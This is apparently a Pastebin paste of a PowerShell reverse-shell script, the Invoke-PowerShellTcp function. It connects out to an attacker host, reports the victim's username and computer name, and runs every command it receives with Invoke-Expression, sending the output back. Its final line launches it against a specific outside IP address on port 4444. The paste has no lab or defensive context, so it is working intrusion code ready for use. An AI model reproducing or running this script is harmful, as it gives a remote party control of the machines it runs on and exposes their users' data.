Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Invoke-PowerShellTcp
- {
- [CmdletBinding(DefaultParameterSetName="reverse")] Param(
- [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
- [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
- [String]
- $IPAddress,
- [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
- [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
- [Int]
- $Port,
- [Parameter(ParameterSetName="reverse")]
- [Switch]
- $Reverse,
- [Parameter(ParameterSetName="bind")]
- [Switch]
- $Bind
- )
- try
- {
- #Connect back if the reverse switch is used.
- if ($Reverse)
- {
- $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
- }
- #Bind to the provided port if Bind switch is used.
- if ($Bind)
- {
- $listener = [System.Net.Sockets.TcpListener]$Port
- $listener.start()
- $client = $listener.AcceptTcpClient()
- }
- $stream = $client.GetStream()
- [byte[]]$bytes = 0..65535|%{0}
- #Send back current username and computername
- $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
- $stream.Write($sendbytes,0,$sendbytes.Length)
- #Show an interactive PowerShell prompt
- $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
- $stream.Write($sendbytes,0,$sendbytes.Length)
- while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
- {
- $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
- $data = $EncodedText.GetString($bytes,0, $i)
- try
- {
- #Execute the command on the target.
- $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
- }
- catch
- {
- Write-Warning "Something went wrong with execution of command on the target."
- Write-Error $_
- }
- $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
- $x = ($error[0] | Out-String)
- $error.clear()
- $sendback2 = $sendback2 + $x
- #Return the results
- $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
- $stream.Write($sendbyte,0,$sendbyte.Length)
- $stream.Flush()
- }
- $client.Close()
- if ($listener)
- {
- $listener.Stop()
- }
- }
- catch
- {
- Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
- Write-Error $_
- }
- }
- Invoke-PowerShellTcp -Reverse -IPAddress 178.54.139.105 -Port 4444
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement